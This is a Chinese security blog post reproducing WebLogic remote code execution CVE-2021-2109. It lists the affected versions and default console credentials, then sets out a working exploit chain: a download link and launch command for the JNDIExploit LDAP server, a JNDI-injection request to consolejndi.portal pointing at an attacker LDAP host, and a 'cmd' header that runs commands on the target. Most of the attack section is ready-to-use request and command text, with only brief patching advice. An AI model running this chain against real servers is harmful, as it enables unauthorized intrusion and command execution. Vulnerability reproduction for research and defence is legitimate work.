影响版本
WeblogicServer
10.3.6.0.0,
12.1.3.0.0,
12.2.1.3.0,
12.2.1.4.0,
14.1.1.0.0
其他漏洞影响的组件可详细参考官方公告
漏洞复现
访问console登陆页面
http://192.168.2.7:7001/console/login/LoginForm.jsp
User: weblogic
Pass: welcome1
登陆
启动LDAP
下载地址:
https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
启动命令
java -jar JNDIExploit-v1.11.jar -ihttp://192.168.2.7/
POC
/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.2;7:1389/Basic/WeblogicEcho;AdminServer%22) |
cmd: 执行的命令
GET/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.2;7:1389/Basic/WeblogicEcho;AdminServer%22)HTTP/1.1 Host: 192.168.2.7:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X10.16; rv:84.0) Gecko/20100101 Firefox/84.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close cmd: id Cookie:ADMINCONSOLESESSION=heYqQ2eUftBPoL7QV1UkuV_OIGBCFx-EF-gwXjcfSZUPtbw-p-YM!144315005 Upgrade-Insecure-Requests: 1 |
成功命令执行
总结建议
weblogic总是频频曝出命令执行,建议用户使用时持续关注,更新到最新版本,得以解决版本漏洞问题。
Reference
https://xz.aliyun.com/t/9049
为多省公安厅提供技术支撑工作,为上合峰会、财富论坛、金砖五国等多次重大活动提供网络安保支撑工作。在多次攻防赛事中连获佳绩,网安中国行第一名,连续两届红帽杯冠军、网鼎杯线上第一名,在补天杯、极棒杯、全国多地的护网演习等也都获得优秀的成绩,每年获得大量的CNVD、CNNVD、CICSVD、CVE证书、编号和致谢。如需帮助请咨询 [email protected]
本文始发于微信公众号(山石网科安全技术研究院):WebLogic远程代码执行(CVE-2021-2109)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论